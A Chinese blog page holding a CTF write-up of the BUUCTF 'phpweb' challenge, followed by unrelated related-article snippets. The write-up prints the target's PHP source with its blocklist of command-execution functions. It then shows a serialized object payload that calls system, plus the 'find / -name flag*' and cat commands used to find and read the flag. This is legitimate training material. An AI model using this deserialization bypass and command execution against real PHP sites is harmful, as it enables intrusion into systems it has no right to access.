当前位置: 首页 > news >正文

buuctf-[网鼎杯 2020 朱雀组]phpweb

news 2026/2/9 12:46:54

1.打开网站,吓我一跳

2.查看源代码,主要看到timezone,然后这个页面是五秒就会刷新一次

一开始去搜了这个,但是没什么用

3.使用bp抓包

会发现有两个参数,应该是用func来执行p

 4.修改func和p

file_get_contents: 把整个文件读入一个字符串中。该函数是用于把文件的内容读入到一个字符串中的首选方法。

读取index.php

5.使用post传参,查看页面源代码

审计

<?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");    //定义disable_fun这个数组,禁用了这些函数function gettime($func, $p) {$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {return $result;} else {return "";}}   //定义了一个名为gettime的函数,它接受一个函数名func和参数p,并通过call_user_func函数来调用指定的函数。a 获取变量的类型,如果a是字符串,则将其返回,否则返回空字符串。
//gettype() 函数用于获取变量的类型class Test {var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);} //定义了一个名为Test的类,其中包含了一个变量$p表示日期格式,以及一个变量$func表示要执行的函数名。在类的析构函数__destruct中,首先检查$func是否为空。如果不为空,则调用gettime函数来执行指定的函数,并将结果输出。
//__destruct() 魔术方法 对象被销毁时触发}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];  //从$_REQUEST超全局变量中获取传入的函数名和参数if ($func != null) {$func = strtolower($func);  //如果传入的函数名不为空,则将其转换为小写if (!in_array($func,$disable_fun)) {echo gettime($func, $p);}else {die("Hacker...");}  //检查其是否在$disable_fun数组中。如果函数名不在禁用列表中,则调用gettime函数来执行指定的函数,并将结果输出。否则,代码将输出"Hacker..."并终止程序。}?>

https://www.cnblogs.com/fps2tao/p/7865423.html    call_user_func函数详解

6.使用反序列化

先看一下有什么文件

<?php
class Test
{var $p = "ls";var $func = "system";
}
$a = new Test();
echo serialize($a);
?>

查看源代码,没有看到什么

查找含有flag的文件

find / -name flag*

 

 cat 这个文件

 















相关文章:
















buuctf-[网鼎杯 2020 朱雀组]phpweb




1.打开网站&#xff0c;吓我一跳 
2.查看源代码&#xff0c;主要看到timezone&#xff0c;然后这个页面是五秒就会刷新一次 一开始去搜了这个&#xff0c;但是没什么用 3.使用bp抓包 
会发现有两个参数&#xff0c;应该是用func来执行p 4.修改func和p 
file_get_contents&#…...






编程日记
2023/9/21 19:28:13



















SpringBoot实战(二十四)集成 LoadBalancer




目录 一、简介1.定义2.取代 Ribbon3.主要特点与功能4.LoadBalancer 和 OpenFeign 的关系 二、使用场景一&#xff1a;Eureka  LoadBalancer服务A&#xff1a;loadbalancer-consumer 消费者1.Maven依赖2.application.yml配置3.RestTemplateConfig.java4.DemoController.java 服务…...






编程日记
2023/9/21 19:27:12



















文件挂载nas挂载




准备资源 
nas服务器&#xff1a; 192.168.1.2 
分配的nas卷名&#xff1a; mynasvolumename 
在本地机器挂载nas卷 
mkdir -p /mnt/localmountdir 
执行挂载 
mount -t nfs 192.168.1.2:mynasvolumename/   /mnt/localmountdir 
本地进入nas目录 
cd /mnt/localmountdir 
可以…...






编程日记
2023/9/21 19:26:11



















电影格式怎么转换mp4?电影格式转换教程




电影格式怎么转换mp4&#xff1f;平时喜欢看电影的小伙伴都知道&#xff0c;平时我们下载到的电影文件格式可谓是五花八门&#xff0c;如Mp4、Flv、AVI、WMV、MKV、MOV等。然而&#xff0c;相较于其他常用格式&#xff0c;MP4是一种使用最为广泛的视频格式&#xff0c;并且文件…...






编程日记
2023/9/21 19:24:08



















HarmonyOS之 组件的使用




一 容器 
1.1 容器分类 Column表示沿垂直方向布局的容器。Row表示沿水平方向布局的容器。 1.2 主轴和交叉轴 
主轴&#xff1a;在Column容器中的子组件是按照从上到下的垂直方向布局的&#xff0c;其主轴的方向是垂直方向&#xff1b;在Row容器中的组件是按照从左到右的水平方向…...






编程日记
2023/9/21 19:23:07



















IAM:身份验证与授权




身份验证和授权可能听起来相似&#xff0c;但在核心功能方面它们是不同的。身份验证和授权是在用户尝试访问其资源时执行的安全过程。身份验证和授权在防止网络安全漏洞和加强组织的安全系统方面发挥着至关重要的作用。 
验证&#xff1a;验证用户的身份 - 用户是谁&#xff1f…...






编程日记
2023/9/21 19:21:05



















Linux——vi编辑器




目录 
一、基本简介 
二、命令模式下的常用按键 
1、光标跳转按键 
2、复制、粘贴、删除 
三、编辑模式 
四、末行模式 
1、查找关键字并替换 
2、保存退出 
3、其他操作 
五、模式切换 一、基本简介 
1、最早可追随到1991年&#xff0c;全称为“Vi IMproved” 
2、模式 ——命…...






编程日记
2023/9/21 19:18:03



















【Linux学习笔记】权限




1. 普通用户和root用户权限之间的切换2. 权限的三个w2.1. 什么是权限&#xff08;what&#xff09;2.1.1. 用户角色2.1.2. 文件属性 2.2. 怎么操作权限呢&#xff1f;&#xff08;how&#xff09;2.2.1. ugo-rwx方案2.2.2. 八进制方案2.2.3. 文件权限的初始模样2.2.4. 进入一个…...






编程日记
2023/9/21 19:16:02



















Aspose转pdf乱码问题




一、问题描述 
​ 在centos服务器使用aspose.word转换word文件为pdf的时候显示中文乱码(如图)&#xff0c;但是在win服务器上使用可以正常转换 二、问题原因 
由于linux服务器缺少对应的字库导致文件转换出现乱码的 三、解决方式 
1.将window中字体(c:\windows\fonts)放到linux…...






编程日记
2023/9/21 19:15:01



















table中的td内部的元素不能与td等高的问题




解决该问题的办法: 
td标签内部的元素使用table布局&#xff0c;但是需要注意的是td必须设置高度&#xff0c;高度为任意值都可以&#xff0c;虽然设置了高度&#xff0c;但是td依然会被内部内容的高度撑开 
<template><table><tr><td><div class&q…...






编程日记
2023/9/21 19:11:58



















Layui + Flask | 实现数据表格修改(案例篇)(09)




此案例内容比较多,建议滑到最后点击阅读原文,阅读体验更佳。后续也会录制案例视频,将在本周内上传到同名的 b 站账号。 接下来演示用 flask + layui 搭建一个学员信息管理的案例 这个案例将会利用 flask 做后端,layui table 组件做前端,基于 restful api 完成一个学员信息…...






编程日记
2023/9/21 19:10:57



















BCC源码编译和安装




接前一篇文章&#xff1a;BCC源码下载 1. 进入源码根目录 
进入到BCC源码根目录。命令及结果如下&#xff1a; 
$ cd bcc
~/eBPF/BCC/bcc$ ls
cmake           CONTRIBUTING-SCRIPTS.md  docs      images         libbpf-tools  man            scripts  src
CMakeLists.txt  …...






编程日记
2023/9/21 19:09:57



















linux上gitlab备份与还原




三 Gitlab备份 
1.gitlab安装 
1.1 添加镜像地址 
添加镜像地址的目的是为了提高国内用户软件下载的速度&#xff0c;编辑(新建)文件gitlab-ce.repo&#xff0c;指令&#xff1a; 
vi /etc/yum.repos.d/gitlab-ce.repo复制 
输入&#xff1a; 
[gitlab-ce]
namegitlab-ce
# 清华…...






编程日记
2023/9/21 19:07:55



















【精华】具身智能:人工智能的下一个浪潮




从符号主义到联结主义&#xff0c;智能体与真实世界的交互得到日益重视。上世纪五十年代的达特茅斯会议之后的一段时期内&#xff0c;对人工智能的研究主要限于符号处理范式&#xff08;符号主义&#xff09;。符号主义的局限性很快在实际应用中暴露出来&#xff0c;并催动了联…...






编程日记
2023/9/21 19:04:52



















【线性回归、岭回归、Lasso回归分别预测患者糖尿病病情】数据挖掘实验一




Ⅰ、项目任务要求 
任务描述&#xff1a;将“diabetes”糖尿病患者数据集划分为训练集和测试集&#xff0c;利用训练集分别结合线性回归、岭回归、Lasso回归建立预测模型&#xff0c;再利用测试集来预测糖尿病患者病情并验证预测模型的拟合能力。具体任务要求如下&#xff1a; …...






编程日记
2023/9/21 19:02:50



















037:vue项目监听页面变化,动态设置iframe元素高度




第037个 查看专栏目录: VUE ------ element UI 专栏目标 
在vue和element UI联合技术栈的操控下&#xff0c;本专栏提供行之有效的源代码示例和信息点介绍&#xff0c;做到灵活运用。 &#xff08;1&#xff09;提供vue2的一些基本操作&#xff1a;安装、引用&#xff0c;模板使…...






编程日记
2023/9/21 19:01:49



















探索前端生成二维码技术:简单实用的实现方式




引言 
随着智能手机的普及&#xff0c;二维码已经成为了现代生活中不可或缺的一部分。在许多场景下&#xff0c;我们都需要将某些信息或链接以二维码的形式展示出来。本文将介绍一种简单实用的前端生成二维码的技术&#xff0c;并给出具体的代码示例。 
二维码生成原理 
首先&a…...






编程日记
2023/9/21 19:00:48



















python装13的一些写法




一些当你离职后&#xff0c;让老板觉拍大腿的代码 1. any(** in ** for ** in **) 判断某个集合元素&#xff0c;是否包含某个/某些元素 
代码&#xff1a; 
if __name__  __main__:# 判断 list1 中是否包含某个/某些元素list1  [1,2,3,4]a  any(x in [5,4] for x in list1) 
输…...






编程日记
2023/9/21 18:59:47



















黑马JVM总结(十八)




&#xff08;1&#xff09;G1_FullGC的概念辨析 SerialGC&#xff1a;串行的&#xff0c;ParallelGC&#xff1a;并行的  &#xff0c;CMS和G1都是并发的 
这几种垃圾回收器的新生代回收机制时相同的&#xff0c;SerialGC和ParalledGC&#xff1a;老年代内存不足触发的叫FullGC…...






编程日记
2023/9/21 18:58:46



















Android调用相机拍照,展示拍摄的图片




调用相机&#xff08;隐式调用&#xff09; 
//自定义一个请求码 这里我设为10010int TAKE_PHOTO_REQUEST  10010;int RESULT_CANCELED  0;//定义取消码//触发监听&#xff0c;调用相机image_camera.setOnClickListener(new View.OnClickListener() {Overridepublic void onCli…...






编程日记
2023/9/21 18:57:45





















简易版抽奖活动的设计技术方案




1.前言 
本技术方案旨在设计一套完整且可靠的抽奖活动逻辑,确保抽奖活动能够公平、公正、公开地进行,同时满足高并发访问、数据安全存储与高效处理等需求,为用户提供流畅的抽奖体验,助力业务顺利开展。本方案将涵盖抽奖活动的整体架构设计、核心流程逻辑、关键功能实现以及…...






编程新知
2026/2/7 17:41:40



















通过Wrangler CLI在worker中创建数据库和表




官方使用文档&#xff1a;Getting started  Cloudflare D1 docs  
创建数据库 
在命令行中执行完成之后&#xff0c;会在本地和远程创建数据库&#xff1a; 
npx wranglerlatest d1 create prod-d1-tutorial 在cf中就可以看到数据库&#xff1a; 
现在&#xff0c;您的Cloudfla…...






编程新知
2026/1/31 6:18:08



















FastAPI 教程:从入门到实践




FastAPI 是一个现代、快速&#xff08;高性能&#xff09;的 Web 框架&#xff0c;用于构建 API&#xff0c;支持 Python 3.6。它基于标准 Python 类型提示&#xff0c;易于学习且功能强大。以下是一个完整的 FastAPI 入门教程&#xff0c;涵盖从环境搭建到创建并运行一个简单的…...






编程新知
2025/10/16 7:51:26



















渲染学进阶内容——模型




最近在写模组的时候发现渲染器里面离不开模型的定义,在渲染的第二篇文章中简单的讲解了一下关于模型部分的内容,其实不管是方块还是方块实体,都离不开模型的内容 
🧱 一、CubeListBuilder 功能解析 
CubeListBuilder 是 Minecraft Java 版模型系统的核心构建器,用于动态创…...






编程新知
2025/11/25 22:59:17



















el-switch文字内置




el-switch文字内置 
效果 vue <div style"color:#ffffff;font-size:14px;float:left;margin-bottom:5px;margin-right:5px;">自动加载</div>
<el-switch v-model"value" active-color"#3E99FB" inactive-color"#DCDFE6"…...






编程新知
2026/1/26 10:00:16



















IoT/HCIP实验-3/LiteOS操作系统内核实验(任务、内存、信号量、CMSIS..)




文章目录 概述HelloWorld 工程C/C配置编译器主配置Makefile脚本烧录器主配置运行结果程序调用栈 任务管理实验实验结果osal 系统适配层osal_task_create 其他实验实验源码内存管理实验互斥锁实验信号量实验 CMISIS接口实验还是得JlINKCMSIS 简介LiteOS->CMSIS任务间消息交互…...






编程新知
2026/1/31 23:44:39



















Java + Spring Boot + Mybatis 实现批量插入




在 Java 中使用 Spring Boot 和 MyBatis 实现批量插入可以通过以下步骤完成。这里提供两种常用方法&#xff1a;使用 MyBatis 的 <foreach> 标签和批处理模式&#xff08;ExecutorType.BATCH&#xff09;。 方法一&#xff1a;使用 XML 的 <foreach> 标签&#xff…...






编程新知
2025/6/11 2:44:05



















基于IDIG-GAN的小样本电机轴承故障诊断




目录 🔍 核心问题 
一、IDIG-GAN模型原理 
1. 整体架构 
2. 核心创新点 
(1) ​梯度归一化(Gradient Normalization)​​ 
(2) ​判别器梯度间隙正则化(Discriminator Gradient Gap Regularization)​​ 
(3) ​自注意力机制(Self-Attention)​​ 
3. 完整损失函数 
二…...






编程新知
2026/1/31 10:58:46



















Golang——6、指针和结构体




指针和结构体 1、指针1.1、指针地址和指针类型1.2、指针取值1.3、new和make 2、结构体2.1、type关键字的使用2.2、结构体的定义和初始化2.3、结构体方法和接收者2.4、给任意类型添加方法2.5、结构体的匿名字段2.6、嵌套结构体2.7、嵌套匿名结构体2.8、结构体的继承 3、结构体与…...






编程新知
2026/1/28 11:35:09



















在鸿蒙HarmonyOS 5中使用DevEco Studio实现企业微信功能




1. 开发环境准备 ​​安装DevEco Studio 3.1​​&#xff1a; 从华为开发者官网下载最新版DevEco Studio安装HarmonyOS 5.0 SDK  ​​项目配置​​&#xff1a; // module.json5
{"module": {"requestPermissions": [{"name": "ohos.permis…...






编程新知
2025/12/29 15:43:26